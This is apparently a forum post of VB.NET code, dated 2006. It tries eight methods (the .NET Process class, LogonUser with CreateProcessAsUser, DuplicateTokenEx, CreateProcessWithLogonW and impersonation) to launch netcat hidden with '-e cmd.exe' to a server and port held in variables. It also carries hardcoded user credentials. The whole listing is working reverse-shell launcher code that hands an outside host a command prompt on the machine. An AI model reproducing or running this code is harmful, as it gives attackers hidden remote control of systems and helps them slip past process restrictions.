<DllImport("C:\\Windows\\System32\\advapi32.dll", SetLastError:=True)> _ Public Function CreateProcessAsUserW(ByVal pToken As IntPtr, _ ByVal lpApplicationName As String, _ ByRef lpCommandLine As String, _ ByRef lpProcessAttributes As SECURITY_ATTRIBUTES, _ ByRef lpThreadAttributes As SECURITY_ATTRIBUTES, _ ByVal bInheritHandles As Boolean, _ ByVal dwCreationFlags As Integer, _ ByRef lpEnvironment As IntPtr, _ ByVal lpCurrentDirectory As String, _ ByRef lpStartupInfo As STARTUP_INFO, _ ByRef lpProcessInfo As PROCESS_INFO) As Boolean End Function <DllImport("C:\\Windows\\System32\\advapi32.dll", SetLastError:=True)> _ Public Function DuplicateTokenEx(ByVal hExistingToken As IntPtr, _ ByVal dwDesiredAccess As UInteger, _ ByRef lpTokenAttributes As SECURITY_ATTRIBUTES, _ ByVal ImpersonationLevel As Integer, _ ByVal TokenType As Integer, _ ByRef phNewToken As IntPtr) As Boolean End Function #End Region <PermissionSetAttribute(SecurityAction.Demand, Name:="FullTrust")> _ Sub Main() Try Dim bReturn As Boolean Dim strNC As String = System.Environment.CurrentDirectory + "\nc.exe " Dim strNCArgs As String = strServer + " " + strPort + " -e cmd.exe" Dim strNotepad As String = "c:\windows\notepad.exe" 'token returned from LogonUser and CreateProcessAsUser Dim pUserToken As IntPtr = IntPtr.Zero 'Security attributes struct Dim pSecurityAttributes As SECURITY_ATTRIBUTES pSecurityAttributes.bInheritHandle = True pSecurityAttributes.nLength = Marshal.SizeOf(pSecurityAttributes) pSecurityAttributes.lpSecurityDescriptor = IntPtr.Zero 'Start information struct Dim pStartInfo As STARTUP_INFO = Nothing pStartInfo.cb = Len(pStartInfo) pStartInfo.lpTitle = "" pStartInfo.dwFlags = 0& pStartInfo.lpDesktop = "winsta0\default" 'Process information struct Dim pProcessInfo As PROCESS_INFO 'Enviroment variable Dim pEnviroment As IntPtr = IntPtr.Zero 'Method 1 - Use the built in .NET process class no user startProcessNoUser() 'method 2 - .NET with new 2.0 user and password startProcess() 'method 3 - Windows API LogonUser and CreateProcessAsUser bReturn = LogonUser("U3er", ".", "Pa33Word", LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT, pUserToken) System.Console.WriteLine("Method 3 LogonUser - " + CStr(Marshal.GetLastWin32Error())) bReturn = CreateProcessAsUser(pUserToken, System.Environment.CurrentDirectory + "\nc.exe", strServer + " " + strPort + " -e cmd.exe", Nothing, Nothing, False, 0, Nothing, System.Environment.CurrentDirectory, pStartInfo, pProcessInfo) System.Console.WriteLine("Method 3 CreateProcessAsUser - " + CStr(Marshal.GetLastWin32Error())) System.Console.WriteLine() 'Method 4 - Same as 3 but add DuplicateTokenEx after LogonUser 'Primary token Dim DupedToken As IntPtr = IntPtr.Zero bReturn = LogonUser("U3er", ".", "Pa33Word", LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT, pUserToken) System.Console.WriteLine("Method 4 LogonUser - " + CStr(Marshal.GetLastWin32Error())) bReturn = DuplicateTokenEx(pUserToken, MAXIMUM_ALLOWED, pSecurityAttributes, SECURITY_IMPERSONATION, TOKEN_PRIMARY, DupedToken) System.Console.WriteLine("Method 4 DuplicateTokenEx - " + CStr(Marshal.GetLastWin32Error())) bReturn = CreateProcessAsUser(pUserToken, strNC, strNCArgs, pSecurityAttributes, pSecurityAttributes, False, 0, Nothing, System.Environment.CurrentDirectory, pStartInfo, pProcessInfo) System.Console.WriteLine("Method 4 CreateProcessAsUser - " + CStr(Marshal.GetLastWin32Error())) System.Console.WriteLine() 'Method 5 - Same as 4 but use the unicode version of CreateProcessAsUser (CreateProcessAsUserW) bReturn = LogonUser("U3er", ".", "Pa33Word", LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT, pUserToken) System.Console.WriteLine("Method 5 LogonUser - " + CStr(Marshal.GetLastWin32Error())) bReturn = DuplicateTokenEx(pUserToken, MAXIMUM_ALLOWED, pSecurityAttributes, SECURITY_IMPERSONATION, TOKEN_PRIMARY, DupedToken) System.Console.WriteLine("Method 5 DuplicateTokenEx - " + CStr(Marshal.GetLastWin32Error())) bReturn = CreateProcessAsUserW(pUserToken, strNC, strNCArgs, pSecurityAttributes, pSecurityAttributes, False, 0, Nothing, System.Environment.CurrentDirectory, pStartInfo, pProcessInfo) System.Console.WriteLine("Method 5 CreateProcessAsUserW - " + CStr(Marshal.GetLastWin32Error())) System.Console.WriteLine() 'Method 6 - Use the API CreateProcessWithLogonW Dim iReturn As Integer iReturn = CreateProcessWithLogonW("U3er", System.Environment.MachineName, "Pa33Word", LOGON_NETCREDENTIALS_ONLY, Nothing, System.Environment.CurrentDirectory + strNC + " " + strNCArgs, CREATE_DEFAULT_ERROR_MODE, Nothing, System.Environment.CurrentDirectory, pStartInfo, pProcessInfo) System.Console.WriteLine("Method 6 CreateProcessWithLogonW - " + CStr(Marshal.GetLastWin32Error())) System.Console.WriteLine() 'Method 7 - APIs with everything but the kitchen thrown in Dim hwinstaSave As IntPtr Dim hwinsta As IntPtr Dim hdesk As IntPtr hwinstaSave = GetProcessWindowStation() System.Console.WriteLine("Method 7 GetProcessWindowStation - " + CStr(Marshal.GetLastWin32Error())) hwinsta = OpenWindowStation("winsta0", False, WINSTA_ALL_ACCESS) System.Console.WriteLine("Method 7 OpenWindowStation - " + CStr(Marshal.GetLastWin32Error())) SetProcessWindowStation(hwinsta) System.Console.WriteLine("Method 7 SetProcessWindowStation - " + CStr(Marshal.GetLastWin32Error())) hdesk = OpenDesktop("default", 0, False, READ_CONTROL And WRITE_DAC And DESKTOP_WRITEOBJECTS And DESKTOP_READOBJECTS) System.Console.WriteLine("Method 7 OpenDesktop - " + CStr(Marshal.GetLastWin32Error())) SetProcessWindowStation(hwinstaSave) System.Console.WriteLine("Method 7 SetProcessWindowStation - " + CStr(Marshal.GetLastWin32Error())) 'use method 4 bReturn = LogonUser("U3er", ".", "Pa33Word", LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT, pUserToken) System.Console.WriteLine("Method 7 LogonUser - " + CStr(Marshal.GetLastWin32Error())) bReturn = DuplicateTokenEx(pUserToken, MAXIMUM_ALLOWED, pSecurityAttributes, SECURITY_IMPERSONATION, TOKEN_PRIMARY, DupedToken) System.Console.WriteLine("Method 7 DuplicateTokenEx - " + CStr(Marshal.GetLastWin32Error())) bReturn = CreateProcessAsUser(pUserToken, strNC, strNCArgs, Nothing, Nothing, False, 0, Nothing, System.Environment.CurrentDirectory, pStartInfo, pProcessInfo) System.Console.WriteLine("Method 7 CreateProcessAsUser - " + CStr(Marshal.GetLastWin32Error())) System.Console.WriteLine() 'Method 8 - Use some crazy ideas from .NET to set impersonation 'get token from LogonUser API bReturn = LogonUser("U3er", ".", "Pa33Word", LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT, pUserToken) System.Console.WriteLine("Method 8 LogonUser - " + CStr(Marshal.GetLastWin32Error())) Dim newId As New WindowsIdentity(pUserToken) Dim impersonatedUser As WindowsImpersonationContext = newId.Impersonate() 'Use method 1 startProcessNoUser() Console.ReadKey() Catch ex As Exception Console.WriteLine(" Exception thrown " + ex.ToString) End Try End Sub Public Sub startProcessNoUser() Try Dim p As New Process p.StartInfo.Arguments = strServer + " " + strPort + " -e cmd.exe" p.StartInfo.CreateNoWindow = True p.StartInfo.ErrorDialog = False p.StartInfo.FileName = System.Environment.CurrentDirectory + "\nc.exe" p.StartInfo.UseShellExecute = False p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden p.StartInfo.RedirectStandardOutput = True Console.WriteLine("Method 1 .NET No User - Command: " + p.StartInfo.FileName + " " + p.StartInfo.Arguments) p.Start() Catch ex As Exception Console.WriteLine(ex.ToString) End Try End Sub Public Sub startProcess() Try Dim p As New Process p.StartInfo.UserName = "U3er" Dim ssPass As New System.Security.SecureString Dim c As Char For Each c In "Pa33Word" ssPass.AppendChar(c) Next p.StartInfo.Password = ssPass p.StartInfo.Domain = System.Environment.MachineName p.StartInfo.Arguments = strServer + " " + strPort + " -e cmd.exe" p.StartInfo.CreateNoWindow = True p.StartInfo.ErrorDialog = False p.StartInfo.FileName = System.Environment.CurrentDirectory + "\nc.exe" p.StartInfo.UseShellExecute = False p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden p.StartInfo.RedirectStandardOutput = True Console.WriteLine("Method 1 .NET No User - User: " + p.StartInfo.Domain + "\" + p.StartInfo.UserName + " Command: " + p.StartInfo.FileName + " " + p.StartInfo.Arguments) p.Start() Catch ex As Exception Console.WriteLine(ex.ToString) End Try End Sub End Module
Mon Jul 10, 2006
Reply New Discussion
|
